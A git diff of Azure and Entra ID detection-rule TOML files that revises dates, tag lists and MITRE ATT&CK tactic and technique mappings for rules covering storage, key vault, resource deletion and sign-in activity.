+[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1110" +name = "Brute Force" +reference = "https://attack.mitre.org/techniques/T1110/" +[[rule.threat.technique.subtechnique]] +id = "T1110.003" +name = "Password Spraying" +reference = "https://attack.mitre.org/techniques/T1110/003/" + + + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules/integrations/azure/discovery_storage_blob_container_access_modification.toml b/rules/integrations/azure/discovery_storage_blob_container_access_modification.toml index 36e63b171e3..f39b0218f9a 100644 --- a/rules/integrations/azure/discovery_storage_blob_container_access_modification.toml +++ b/rules/integrations/azure/discovery_storage_blob_container_access_modification.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/20" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] @@ -64,7 +64,7 @@ references = ["https://docs.microsoft.com/en-us/azure/storage/blobs/anonymous-re risk_score = 21 rule_id = "2636aa6c-88b5-4337-9c31-8d0192a8ef45" severity = "low" -tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: Azure", "Use Case: Asset Visibility", "Resources: Investigation Guide"] +tags = ["Domain: Cloud", "Data Source: Azure", "Use Case: Asset Visibility", "Tactic: Discovery", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -75,13 +75,38 @@ event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOF [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1619" +name = "Cloud Storage Object Discovery" +reference = "https://attack.mitre.org/techniques/T1619/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1222" name = "File and Directory Permissions Modification" reference = "https://attack.mitre.org/techniques/T1222/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1537" +name = "Transfer Data to Cloud Account" +reference = "https://attack.mitre.org/techniques/T1537/" + + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" + diff --git a/rules/integrations/azure/exfiltration_azure_storage_blob_download_azcopy_sas_token.toml b/rules/integrations/azure/exfiltration_azure_storage_blob_download_azcopy_sas_token.toml index 0a1058aa6b4..ca5229f3624 100644 --- a/rules/integrations/azure/exfiltration_azure_storage_blob_download_azcopy_sas_token.toml +++ b/rules/integrations/azure/exfiltration_azure_storage_blob_download_azcopy_sas_token.toml @@ -2,7 +2,7 @@ creation_date = "2025/10/02" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/10/02" [rule] author = ["Elastic"] @@ -71,7 +71,16 @@ To ensure this rule functions correctly, the following diagnostic logs must be e - StorageRead: This log captures all read operations performed on blobs in the storage account, including GetBlob operations. These logs should be streamed to the Event Hub used for the Azure integration configuration. """ severity = "medium" -tags = ["Domain: Cloud", "Domain: Storage", "Tactic: Collection", "Data Source: Azure", "Data Source: Azure Platform Logs", "Data Source: Azure Storage", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Domain: Storage", + "Data Source: Azure", + "Data Source: Azure Platform Logs", + "Data Source: Azure Storage", + "Use Case: Threat Detection", + "Tactic: Exfiltration", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" @@ -86,16 +95,22 @@ event.dataset: azure.platformlogs and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1530" -name = "Data from Cloud Storage" -reference = "https://attack.mitre.org/techniques/T1530/" +id = "T1567" +name = "Exfiltration Over Web Service" +reference = "https://attack.mitre.org/techniques/T1567/" +[[rule.threat.technique.subtechnique]] +id = "T1567.002" +name = "Exfiltration to Cloud Storage" +reference = "https://attack.mitre.org/techniques/T1567/002/" + + [rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" + [rule.new_terms] field = "new_terms_fields" value = ["azure.platformlogs.properties.accountName"] diff --git a/rules/integrations/azure/impact_azure_compute_vm_snapshot_deletion.toml b/rules/integrations/azure/impact_azure_compute_vm_snapshot_deletion.toml index c9a25709e1b..be0e1e3a0ca 100644 --- a/rules/integrations/azure/impact_azure_compute_vm_snapshot_deletion.toml +++ b/rules/integrations/azure/impact_azure_compute_vm_snapshot_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2025/10/10" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/10/10" [rule] author = ["Elastic"] @@ -106,16 +106,22 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1485" +name = "Data Destruction" +reference = "https://attack.mitre.org/techniques/T1485/" [[rule.threat.technique]] id = "T1490" name = "Inhibit System Recovery" reference = "https://attack.mitre.org/techniques/T1490/" + [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" + [rule.new_terms] field = "new_terms_fields" value = ["azure.activitylogs.identity.claims_initiated_by_user.name", "azure.resource.group"] diff --git a/rules/integrations/azure/impact_azure_compute_vm_snapshot_deletions.toml b/rules/integrations/azure/impact_azure_compute_vm_snapshot_deletions.toml index 59ba9cdf06c..6592f3dc246 100644 --- a/rules/integrations/azure/impact_azure_compute_vm_snapshot_deletions.toml +++ b/rules/integrations/azure/impact_azure_compute_vm_snapshot_deletions.toml @@ -2,7 +2,7 @@ creation_date = "2025/10/10" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/10/10" [rule] author = ["Elastic"] @@ -110,16 +110,22 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1485" +name = "Data Destruction" +reference = "https://attack.mitre.org/techniques/T1485/" [[rule.threat.technique]] id = "T1490" name = "Inhibit System Recovery" reference = "https://attack.mitre.org/techniques/T1490/" + [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" + [rule.threshold] field = ["azure.activitylogs.identity.claims_initiated_by_user.name"] value = 1 diff --git a/rules/integrations/azure/impact_azure_storage_account_deletion.toml b/rules/integrations/azure/impact_azure_storage_account_deletion.toml index aff443ad71c..880e9a87e2f 100644 --- a/rules/integrations/azure/impact_azure_storage_account_deletion.toml +++ b/rules/integrations/azure/impact_azure_storage_account_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2025/10/08" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/10/08" [rule] author = ["Elastic"] @@ -86,16 +86,22 @@ event.dataset: azure.activitylogs and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1485" name = "Data Destruction" reference = "https://attack.mitre.org/techniques/T1485/" +[[rule.threat.technique]] +id = "T1489" +name = "Service Stop" +reference = "https://attack.mitre.org/techniques/T1489/" + + [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" + [rule.new_terms] field = "new_terms_fields" value = ["azure.activitylogs.identity.claims_initiated_by_user.name"] diff --git a/rules/integrations/azure/impact_azure_storage_account_deletion_multiple.toml b/rules/integrations/azure/impact_azure_storage_account_deletion_multiple.toml index b35f1bf641c..b3ce7ddb0c8 100644 --- a/rules/integrations/azure/impact_azure_storage_account_deletion_multiple.toml +++ b/rules/integrations/azure/impact_azure_storage_account_deletion_multiple.toml @@ -2,7 +2,7 @@ creation_date = "2025/10/08" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/10/08" [rule] author = ["Elastic"] @@ -90,16 +90,22 @@ event.dataset: azure.activitylogs and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1485" name = "Data Destruction" reference = "https://attack.mitre.org/techniques/T1485/" +[[rule.threat.technique]] +id = "T1489" +name = "Service Stop" +reference = "https://attack.mitre.org/techniques/T1489/" + + [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" + [rule.threshold] field = ["azure.activitylogs.identity.claims_initiated_by_user.name"] value = 1 diff --git a/rules/integrations/azure/impact_key_vault_modified_by_unusual_user.toml b/rules/integrations/azure/impact_key_vault_modified_by_unusual_user.toml index 860bd202ab1..8388ea6ebe5 100644 --- a/rules/integrations/azure/impact_key_vault_modified_by_unusual_user.toml +++ b/rules/integrations/azure/impact_key_vault_modified_by_unusual_user.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/31" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] @@ -78,6 +78,14 @@ event.dataset: "azure.activitylogs" ''' +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" + [rule.new_terms] field = "new_terms_fields" value = ["azure.activitylogs.identity.claims_initiated_by_user.name"] diff --git a/rules/integrations/azure/impact_kubernetes_pod_deleted.toml b/rules/integrations/azure/impact_kubernetes_pod_deleted.toml index 31098219fe4..e1be4f4ec17 100644 --- a/rules/integrations/azure/impact_kubernetes_pod_deleted.toml +++ b/rules/integrations/azure/impact_kubernetes_pod_deleted.toml @@ -2,7 +2,7 @@ creation_date = "2021/06/24" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Austin Songer"] @@ -78,13 +78,19 @@ event.outcome:(Success or success) [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1489" name = "Service Stop" reference = "https://attack.mitre.org/techniques/T1489/" +[[rule.threat.technique]] +id = "T1529" +name = "System Shutdown/Reboot" +reference = "https://attack.mitre.org/techniques/T1529/" + + [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" + diff --git a/rules/integrations/azure/impact_resources_resource_group_deletion.toml b/rules/integrations/azure/impact_resources_resource_group_deletion.toml index 86099be4468..a28f3b45431 100644 --- a/rules/integrations/azure/impact_resources_resource_group_deletion.toml +++ b/rules/integrations/azure/impact_resources_resource_group_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/17" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] @@ -80,13 +80,31 @@ event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOF [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1485" name = "Data Destruction" reference = "https://attack.mitre.org/techniques/T1485/" + [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" + + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/azure/initial_access_azure_arc_cluster_credential_access_unusual_source.toml b/rules/integrations/azure/initial_access_azure_arc_cluster_credential_access_unusual_source.toml index 48d7a122d65..e394d39c999 100644 --- a/rules/integrations/azure/initial_access_azure_arc_cluster_credential_access_unusual_source.toml +++ b/rules/integrations/azure/initial_access_azure_arc_cluster_credential_access_unusual_source.toml @@ -2,7 +2,7 @@ creation_date = "2026/03/10" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/10" [rule] author = ["Elastic"] @@ -89,39 +89,39 @@ event.dataset: "azure.activitylogs" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1552" name = "Unsecured Credentials" reference = "https://attack.mitre.org/techniques/T1552/" - [[rule.threat.technique.subtechnique]] id = "T1552.007" name = "Container API" reference = "https://attack.mitre.org/techniques/T1552/007/" + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/azure/initial_access_entra_id_actor_token_user_impersonation_abuse.toml b/rules/integrations/azure/initial_access_entra_id_actor_token_user_impersonation_abuse.toml index 507a7129a7e..1ef19b65dbd 100644 --- a/rules/integrations/azure/initial_access_entra_id_actor_token_user_impersonation_abuse.toml +++ b/rules/integrations/azure/initial_access_entra_id_actor_token_user_impersonation_abuse.toml @@ -2,7 +2,7 @@ creation_date = "2025/09/18" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/09" [rule] author = ["Elastic"] @@ -65,7 +65,18 @@ references = [ risk_score = 47 rule_id = "8e7a4f2c-9b3d-4e5a-a1b6-c2d8f7e9b3a5" severity = "medium" -tags = ["Domain: Cloud", "Domain: Identity", "Tactic: Defense Evasion", "Data Source: Azure", "Data Source: Entra ID", "Data Source: Entra Audit Logs", "Use Case: Identity and Access Audit", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Domain: Identity", + "Data Source: Azure", + "Data Source: Entra ID", + "Data Source: Entra Audit Logs", + "Use Case: Identity and Access Audit", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" @@ -95,18 +106,31 @@ from logs-azure.auditlogs-* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1550" -name = "Use Alternate Authentication Material" -reference = "https://attack.mitre.org/techniques/T1550/" +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" -[[rule.threat.technique.subtechnique]] -id = "T1550.001" -name = "Application Access Token" -reference = "https://attack.mitre.org/techniques/T1550/001/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/integrations/azure/initial_access_entra_id_device_code_auth_with_broker_client.toml b/rules/integrations/azure/initial_access_entra_id_device_code_auth_with_broker_client.toml index 9568883df81..9ea2a42f57b 100644 --- a/rules/integrations/azure/initial_access_entra_id_device_code_auth_with_broker_client.toml +++ b/rules/integrations/azure/initial_access_entra_id_device_code_auth_with_broker_client.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/24" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] @@ -25,7 +25,14 @@ setup = """ This rule optionally requires Azure Sign-In logs from the Azure integration. Ensure that the Azure integration is correctly set up and that the required data is being collected. """ severity = "medium" -tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Tactic: Initial Access", "Data Source: Azure", "Data Source: Microsoft Entra ID", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: Azure", + "Data Source: Microsoft Entra ID", + "Use Case: Identity and Access Audit", + "Tactic: Initial Access", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -76,30 +83,19 @@ Entra ID Device Code Authentication allows users to authenticate devices using a [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1550" -name = "Use Alternate Authentication Material" -reference = "https://attack.mitre.org/techniques/T1550/" - +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" [[rule.threat.technique.subtechnique]] -id = "T1550.001" -name = "Application Access Token" -reference = "https://attack.mitre.org/techniques/T1550/001/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" +id = "T1566.002" +name = "Spearphishing Link" +reference = "https://attack.mitre.org/techniques/T1566/002/" [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" @@ -109,3 +105,20 @@ reference = "https://attack.mitre.org/techniques/T1078/004/" id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" +[[rule.threat.technique.subtechnique]] +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/azure/initial_access_entra_id_external_guest_user_invite.toml b/rules/integrations/azure/initial_access_entra_id_external_guest_user_invite.toml index eb88bf1eec5..09ce8630b50 100644 --- a/rules/integrations/azure/initial_access_entra_id_external_guest_user_invite.toml +++ b/rules/integrations/azure/initial_access_entra_id_external_guest_user_invite.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/31" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] @@ -67,7 +67,7 @@ references = ["https://docs.microsoft.com/en-us/azure/governance/policy/samples/ risk_score = 21 rule_id = "141e9b3a-ff37-4756-989d-05d7cbf35b0e" severity = "low" -tags = ["Domain: Cloud", "Tactic: Persistence", "Data Source: Azure", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = ["Domain: Cloud", "Data Source: Azure", "Use Case: Identity and Access Audit", "Tactic: Initial Access", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -78,18 +78,26 @@ event.dataset:azure.auditlogs and azure.auditlogs.operation_name:"Invite externa [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1136" -name = "Create Account" -reference = "https://attack.mitre.org/techniques/T1136/" +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1136.003" -name = "Cloud Account" -reference = "https://attack.mitre.org/techniques/T1136/003/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/integrations/azure/initial_access_entra_id_federated_login_by_unusual_client.toml b/rules/integrations/azure/initial_access_entra_id_federated_login_by_unusual_client.toml index 9db32da37e9..61dc6a1a52f 100644 --- a/rules/integrations/azure/initial_access_entra_id_federated_login_by_unusual_client.toml +++ b/rules/integrations/azure/initial_access_entra_id_federated_login_by_unusual_client.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/09" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] @@ -79,7 +79,18 @@ setup = """#### Required Microsoft Entra ID Sign-In Logs To use this rule, ensure that Microsoft Entra ID Sign-In Logs are being collected and streamed into the Elastic Stack via the Azure integration. """ severity = "medium" -tags = ["Domain: Cloud", "Domain: Identity", "Tactic: Defense Evasion", "Tactic: Initial Access", "Data Source: Azure", "Data Source: Microsoft Entra ID", "Data Source: Microsoft Entra ID Sign-In Logs", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Domain: Identity", + "Data Source: Azure", + "Data Source: Microsoft Entra ID", + "Data Source: Microsoft Entra ID Sign-In Logs", + "Use Case: Identity and Access Audit", + "Tactic: Initial Access", + "Tactic: Defense Evasion", + "Tactic: Persistence", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" @@ -97,34 +108,40 @@ event.dataset: "azure.signinlogs" [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1550" -name = "Use Alternate Authentication Material" -reference = "https://attack.mitre.org/techniques/T1550/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" + + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" +[[rule.threat.technique.subtechnique]] +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" + + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + [rule.investigation_fields] field_names = [ "azure.signinlogs.properties.service_principal_name", diff --git a/rules/integrations/azure/initial_access_entra_id_first_time_seen_device_code_auth.toml b/rules/integrations/azure/initial_access_entra_id_first_time_seen_device_code_auth.toml index de672c91aaf..6ff9e5edd71 100644 --- a/rules/integrations/azure/initial_access_entra_id_first_time_seen_device_code_auth.toml +++ b/rules/integrations/azure/initial_access_entra_id_first_time_seen_device_code_auth.toml @@ -2,7 +2,7 @@ creation_date = "2024/10/14" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/26" [rule] author = ["Elastic", "Matteo Potito Giorgio"] @@ -107,31 +107,30 @@ event.dataset:(azure.activitylogs or azure.signinlogs) [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" +[[rule.threat.technique.subtechnique]] +id = "T1566.002" +name = "Spearphishing Link" +reference = "https://attack.mitre.org/techniques/T1566/002/" [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" -[[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" - -[[rule.threat.technique.subtechnique]] -id = "T1566.002" -name = "Spearphishing Link" -reference = "https://attack.mitre.org/techniques/T1566/002/" [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [rule.new_terms] field = "new_terms_fields" value = ["azure.signinlogs.properties.user_principal_name"] diff --git a/rules/integrations/azure/initial_access_entra_id_graph_single_session_from_multiple_addresses.toml b/rules/integrations/azure/initial_access_entra_id_graph_single_session_from_multiple_addresses.toml index 7d8818d01ac..67c5edccbc2 100644 --- a/rules/integrations/azure/initial_access_entra_id_graph_single_session_from_multiple_addresses.toml +++ b/rules/integrations/azure/initial_access_entra_id_graph_single_session_from_multiple_addresses.toml @@ -2,7 +2,7 @@ creation_date = "2025/05/08" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/17" [rule] author = ["Elastic"] @@ -72,7 +72,21 @@ setup = """#### Required Microsoft Entra ID Sign-In and Graph Activity Logs This rule requires the Microsoft Entra ID Sign-In Logs and Microsoft Graph Activity Logs integration to be enabled and configured to collect audit and activity logs via Azure Event Hub. """ severity = "medium" -tags = ["Domain: Cloud", "Domain: Identity", "Domain: API", "Tactic: Defense Evasion", "Data Source: Azure", "Data Source: Microsoft Entra ID", "Data Source: Microsoft Entra ID Sign-In Logs", "Data Source: Microsoft Graph", "Data Source: Microsoft Graph Activity Logs", "Use Case: Identity and Access Audit", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Domain: Identity", + "Domain: API", + "Data Source: Azure", + "Data Source: Microsoft Entra ID", + "Data Source: Microsoft Entra ID Sign-In Logs", + "Data Source: Microsoft Graph", + "Data Source: Microsoft Graph Activity Logs", + "Use Case: Identity and Access Audit", + "Use Case: Threat Detection", + "Resources: Investigation Guide", + "Tactic: Defense Evasion", + "Tactic: Initial Access", +] timestamp_override = "event.ingested" type = "esql" @@ -176,23 +190,36 @@ from logs-azure.signinlogs-*, logs-azure.graphactivitylogs-* metadata _id, _vers [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1550" name = "Use Alternate Authentication Material" reference = "https://attack.mitre.org/techniques/T1550/" - [[rule.threat.technique.subtechnique]] id = "T1550.001" name = "Application Access Token" reference = "https://attack.mitre.org/techniques/T1550/001/" -[[rule.threat.technique.subtechnique]] -id = "T1550.004" -name = "Web Session Cookie" -reference = "https://attack.mitre.org/techniques/T1550/004/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/azure/initial_access_entra_id_illicit_consent_grant_via_registered_application.toml b/rules/integrations/azure/initial_access_entra_id_illicit_consent_grant_via_registered_application.toml index f7d9735ba39..fd3737f9131 100644 --- a/rules/integrations/azure/initial_access_entra_id_illicit_consent_grant_via_registered_application.toml +++ b/rules/integrations/azure/initial_access_entra_id_illicit_consent_grant_via_registered_application.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/01" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] @@ -65,7 +65,16 @@ references = [ risk_score = 47 rule_id = "1c6a8c7a-5cb6-4a82-ba27-d5a5b8a40a38" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Credential Access", "Tactic: Persistence", "Data Source: Azure", "Data Source: Microsoft Entra ID", "Data Source: Microsoft Entra ID Audit Logs", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: Azure", + "Data Source: Microsoft Entra ID", + "Data Source: Microsoft Entra ID Audit Logs", + "Use Case: Identity and Access Audit", + "Resources: Investigation Guide", + "Tactic: Initial Access", + "Tactic: Credential Access", +] timestamp_override = "event.ingested" type = "new_terms" @@ -82,34 +91,34 @@ event.dataset: "azure.auditlogs" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" +[[rule.threat.technique.subtechnique]] +id = "T1566.002" +name = "Spearphishing Link" +reference = "https://attack.mitre.org/techniques/T1566/002/" + + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1528" name = "Steal Application Access Token" reference = "https://attack.mitre.org/techniques/T1528/" + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.001" -name = "Additional Cloud Credentials" -reference = "https://attack.mitre.org/techniques/T1098/001/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/azure/initial_access_entra_id_oauth_auth_code_grant_unusual_app_resource_user.toml 